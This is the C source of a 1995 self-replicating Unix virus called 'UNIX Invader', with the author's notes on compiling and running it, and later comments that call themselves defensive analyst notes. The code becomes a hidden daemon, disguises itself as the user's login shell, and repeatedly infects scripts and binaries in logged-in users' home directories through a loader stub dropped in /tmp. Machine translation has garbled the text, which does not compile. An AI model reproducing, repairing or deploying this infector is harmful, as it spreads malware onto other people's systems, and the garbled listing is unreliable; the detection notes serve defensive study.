This is a computer virus for Unix. Virus name: UNIX Invader (invader).
It features: 1. It has the characteristics of Daemon Process (Lose Control TTY), which is not online, which can still be implemented, will not be terminated by the system. 2. It can be infected with Script File and various types on Unix Binary file (of course, it is suitable), not repeated infection. After infection, the execution document or Script File still executes ... (it seems to be nonsense) 3. The hidden method used on the memory is to scan Passwd file. , Use the User's login shell basename as a program name, so use PS -AUX (single PS) or TOP, you have to look at it carefully ... (a bit treacherous) 4. It does not repeat the long resident, and one of the USER is a user. It is to expand the ability to expand infection. The benefits are not high, so do it ... (Don't tell me kill -9 pid is invincible, I still have a way) How do I experiment? CP a few binary files to your home Directory, do a few starting fonts are # Script file .... How to start? 1. Set this file to filename.c2. gcc -o -o virus @ filename.c or cc -o -o virus @ filename.c ^ ^ is important ! 3. Then there will be some warnings, manage it ...., then there should be a virus @ file display 4. LS -L look at the (Virus @) file length, remember .5. Use vi or any editor to change the #define behind the #define in FileName.c (Local Here) 6. Then revitalize the second step, then the resulting Virus @ is what we want. 7. Execution It ... ok! :)
8. You are poisoned (10 seconds) ........ Once there is a suitable file, you will be infected immediately ... Others: 1. This Virus, the younger brother did not make a part, because destruction Everyone will do it, I don't want to waste energy to think about a cruel destruction ...... Interested people can add .... 2. This Virus is executed under UNIX job system Therefore, proved a little .... As long as there is human, there is nothing impossible to have Virus's Environment, and the method is what people think. 3. If you look at this poison with a system administrator, you can also get a conclusion. This Virus is infected, is quite high by Crack. 4. This Virus is currently the starter of the online Directory in line, in fact, if the user's directory has a Dynamic Symbolic Link to the root directory Next, Search may sweep the directory of the entire Wrok station. 5. This Virus scans the directory from time to time, the internal default is 10 seconds, wake up once, so as not to be discovered ...:) 6. This Virus is not recognizing people. So your own directory will be infected, and your surname setting is useless, so move forward before the experiment! 7. Any experiment, this virus is quite unethical, the author is quite unethical, the author is Our own Linux, you ... you ... you have a good self, being caught or kick, don't tell you, HTK, don't tell you first. Do you have fun!
Note: Dark Slayer, the current head of the Taiwan Power Virus Organization, is also ... 1995/6/15> * /
/ * A VIRUS IN UNIX !!!! * // * written by NCKU EE htk * / # include # include # include # include # include # include # include # include # include # include # include # include # include # include # Include # incrude # incrude
// Analyst notes (defensive reading). This listing was damaged by machine translation:
// identifiers are randomly capitalised, operators and header names are missing, and it does
// not compile as shown. The notes describe only what can still be read from the text.
// Constants: chkt is the pause in seconds between directory passes; VL is a byte count that
// the shell stub (loader/loader2) and the copy routines all depend on; EXE and SCR tag the
// two kinds of target file.
// Detection: the stub text refers to a per-user dot-file under /tmp whose name starts with
// ".@" followed by the output of whoami, and to `tail -c` with the same byte count as VL.
// Both strings are usable when searching shell scripts for appended content.
#define chK 512 # Define perm s_irwxu # define chkt 10 # define loader "/ nrm -f /tmp/.@gawhoami`; Cat <" #define loader2 "| tail -c 18606> / tmp /.@`.. CHMOD 700 / TMP /.@ `Whoami`; / tmp /.@` WHOAMI`; RM -F /TMP/.@`whoami`Exit;/n"/* ^^^^^^^^^ * / # define VL 18606 / * and ^^^^^ Here !!! * / # Define VLL -VL # define buffs 25088 # Define BSI 80 # define EXE 1 # define SCR 2Struct Flock Bk; Int fo, F, STATUS = NULL; INT flagn = 0; void main (argc, argv, envp) int Argc; char * argv []; char * envp []; {char * buf2, * fname; static char PIDP [BSI] = "/ TMP /."; atstatic char bufr [bsi] = ""; static int dec; unsigned int k, kep; struct passwd * getp; int Caller (void); int CHEC (int); char * base (char *); char * * Find (void); void catch (void); int Check (char *, int); Signal (SigCLD, SIG_IGN);
// Builds the PID-file path in PIDP: the "/tmp/." prefix followed by the decimal UID (ecvt,
// with the digit count supplied by CHEC). A dot-file named after a numeric UID directly
// under /tmp is a host artifact worth checking for.
STRCAT (PIDP, ECVT (Double) GetUID (), CHEC (GetUID ()), & DEC, & DEC);
// Copies bytes out of argv[0] into a tempnam() file under /tmp and makes it owner-rwx, so
// that the original program can still be run. The two branches depend on whether the file
// is larger than twice VL; a cleanup tool would have to reverse the same layout.
FNAME = (char *) Tempnam ("/ tmp", null; buf2 = (char *) malloc (bufsize); if ((fo = open (argv [0], o_rdonly) <0 || (f = creat (FNAME, PERM) <0) EXIT (1); IF ((Kep = Lseek (FO, 0L, 2))> 2 * VL) {Lseek (FO, VLL, 2); K = Read (Fo, BUF2 , VL); Write (F, BUF2, K); Lseek (FO, VL, 0); while ((k = read (fo, buf2, bufsize)> 0) Write (f, buf2, k); / * Ignore more Lefting Virus in a tail * /} else {Lseek (FO, VL-KEP, 2); K = Read (Fo, BUF2, KEP-VL); Write (F, BUF2, K);} close (f) CHMOD (FNAME, S_IRWXU); Free (buf2);
// fork(): the parent execs the extracted temp file, or exits when argv[0] contains '@'
// (presumably the bare build, which the notes above name with an '@'). The child sleeps two
// seconds and unlinks the temp file. The loop headers here and on the next line lost text
// in extraction.
IF ((Kep = fork ())> 0) {for (k = 0; k if (* (argv [0] k) == '@') EXIT (0); Execve (FName, Argv, ENVP) } elseif (Kep == 0) {Sleep (2); unlink (fname);
// Overwrites argv[0] with the basename of the login shell from the user's passwd entry, so
// ps/top show a shell-like name. When hunting, compare the displayed name with the real
// executable path of the process instead of trusting argv[0].
For (k = 0; k getp = (struct passwd *) getPwUID (GetUID ()); strcpy (Argv [0], Base (getp-> pw_shell);
/ * Initialize Daemon Process ... * /
// Detaches from the terminal: closes descriptors 0 and 1, clears the umask, forks twice,
// ignores SIGHUP/SIGINT/SIGTTOU, and calls setpgrp and TIOCNOTTY on /dev/tty. It then opens
// the PID file, reads any PID stored there and sends that process SIGUSR1. The SIGUSR1
// handler is catch, which sets flagn.
For (k = 0; k <2; k ) close (k); umask (0); if (fork ()! = 0) exit (0); Signal (SIGHUP, SIG_IGN); SIGNAL (SIGINT, SIG_IGN); Signal (SIGTTOU, SIG_IGN); setPgrp (); if ((Kep = Open ("/ dev / tty", o_rdwr)> = 0) {IOCTL (Kep, Tiocnotty, (char *) 0); Close (KEP) } IF (fork ()! = 0) EXIT (0); Signal (SIGUSR1, CATCH); IF ((Kep = Open (PIDP, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR) <0) Exit (1); K = Read (Kep, BUFR, BSI); IF (K! = 0) Kill (ATOI (BUFR), SIGUSR1;
// Stores its own PID in the PID file, then loops: find() yields login names from utmp,
// getpwnam() supplies each home directory, and ftw() walks it (depth argument 15), calling
// Caller for every entry. Recurring walks of every logged-in user's home directory are an
// observable pattern; file-integrity monitoring would flag the resulting file changes.
STRCPY (BUFR, ECVT ((Double) getPID (), CHEC (getPid ()), & DC, & DEC); Lseek (Kep, 0L, 0); Do {k = Write (Kep, BUFR, Strlen (PIDP) 1); WHILE ((buf2 = find ())! = Null) {getp = (struct passwd *) getPwnam (buf2); if (chdir ((BUF2 = (char *) getp-> pw_dir)) <0) Continue ; if (FTW (BUF2, CALLER, 15)! = 0) Continue;}
// Sleeps chkt seconds between passes and rewinds utmp with setutent(). CHEC returns the
// number of decimal digits in its argument. catch is the SIGUSR1 handler and only sets flagn.
SLEEP (CHKT); setutent (); Lseek (Kep, 0L, 0);} while (1);}} int CHEC (NUM) INT NUM; {Int y = 1; while ((Num = (int) (NUM) / 10))> = 1) y ; return (y);} void catch (void) {Flagn = 1;}
// Analyst notes: the text below is garbled by machine translation and is described only as
// far as it can be read.
// base: scans poi backwards and returns the part after the last '/', or the literal "sh"
// when the string contains no slash.
// find: reads the next utmp record with getutent(). For USER_PROCESS records it copies the
// user name into a static 9-byte buffer and returns it (the copy call itself is garbled in
// this listing). It returns NULL when getutent() yields no record.
Char * base (poi) char * poi; {INT i; for (i = (Strlen (POI) -1); i> = 0; i -) IF (* (POI i) == '/') Return ((char *) (POI i 1)); Return ("sh");} char * find () {static char name [9] = ""; struct utmp * goal; goal = (Struct Utmp * Getutent (); if (goal-> ut_type == user_process) {structure (name, goal-> ut_use); return (name);} if (goal == (struct utmp *) NULL) Return (null);}
// Analyst notes: the text below is garbled by machine translation and is described only as
// far as it can be read.
// Caller: ftw() callback. For regular files (FTW_F) it calls Check(), which opens the file
// into the global descriptor f. The code that sets status to SCR or EXE is not visible in
// this excerpt. If Check fails, the file mode is put back and the entry is skipped.
// SCR branch: the stub text (loader + file name + loader2) and up to VL bytes read from fo
// are written at the end of the script. EXE branch: up to VL bytes from fo are written at
// offset 0, and the bytes that were there are kept later in the same file.
// For responders: a modified file is larger than the original, which still exists inside
// it. Comparing against package checksums or known-good backups is the reliable way to find
// and restore affected files.
Int Caller (Name, Statptr, Type) Char * name; struct stat * statptr; int type; {unsigned int Nread, ymode; static char loading [200]; char buf [vl], buf3 [vl]; if (Type = = Ftw_f) {ymode = statptr-> ST_MODE; if (check (name, ymode) <0) {if (statvice ()) chmod (Name, YMode); return (0);} IF Status == SCR) {STRCPY (LOAD, LOADER); STRCAT (LOAD, NAME); STRCAT (LOAD, LOADER2); LSEEK (F, 0L, 2); Write (f, loading, strlen (loading); lseek FO, 0L, 0); NREAD = Read (FO, BUF, VL); Write (F, BUF, NREAD);} if (status == exe) {if (statptr-> st_size> VL) {Lseek (f, 0L, 0); NREAD = Read (F, BUF, VL); Lseek (F, 0L, 2); Write (F, BUF, NREAD); Lseek (FO, 0L, 0); NREAD = Read (fo, BUF , VL); Lseek (F, 0L, 0); Write (F, BUF, NREAD);} else {Lseek (f, 0l, 0); Nread = Read (f, buf3, vl); ymode = nread; lseek (FO, 0L, 0); NREAD = Read (FO, BUF, VL); Lseek (F, 0L, 0); Write (F, BUF, NREAD); Write (f, buf3, ymode);}} / * Lseek (f, 0l, 0); Lockf (f, f_ulock, 0); * // * Author's Linux Library Has No Above Program Library * /
// Releases the fcntl record lock on f (F_UNLCK from offset 0 with length 0, i.e. the whole
// file).
BK.L_TYPE = f_unlck; bk.l_whence = 0; bk.l_len = 0; bk.l_start = 0; FCNTL (f, f_setlk, & bk);
// Puts the saved mode back when the file belongs to the current UID, closes f, and exits
// the resident process if flagn was set by SIGUSR1.
// Check starts on this line and continues past it. It opens the target read-write. If that
// fails, it first adds owner read/write permission with chmod and retries.
// Hardening note: read-only permission bits on a user's own files do not protect them, since
// the owner can change the mode. Files owned by another account and not writable by the
// user are not opened by this path.
IF (statptr-> st_uid == getuid ()) chmod (name, ymode); close (f);}} (Flagn) exit (0); return (0);} int Check (name, ymode) char * Name ; int ymode; {char CH [CHK]; char CH2 [CHK]; int RD, I; status = (int) NULL; IF ((f = open (name, o_rdwr)) <0) {ix (chmod (Name , YMODE | S_IRUSR | S_IWUSR) <0) Return (-1); IF ((f = Open (Name, O_RDWR)) <0) return (-1);} / * if (Lockf (F, F_Tlock, 0) <0) {close (f); return (-1);} * /
BK.L_TYPE = f_wrlck; bk.l_whence = 0; bk.l_len = 0; bk.l_start = 0; if (Fcntl (f, f_setlk, & b) <0) {close (f); return (-1);}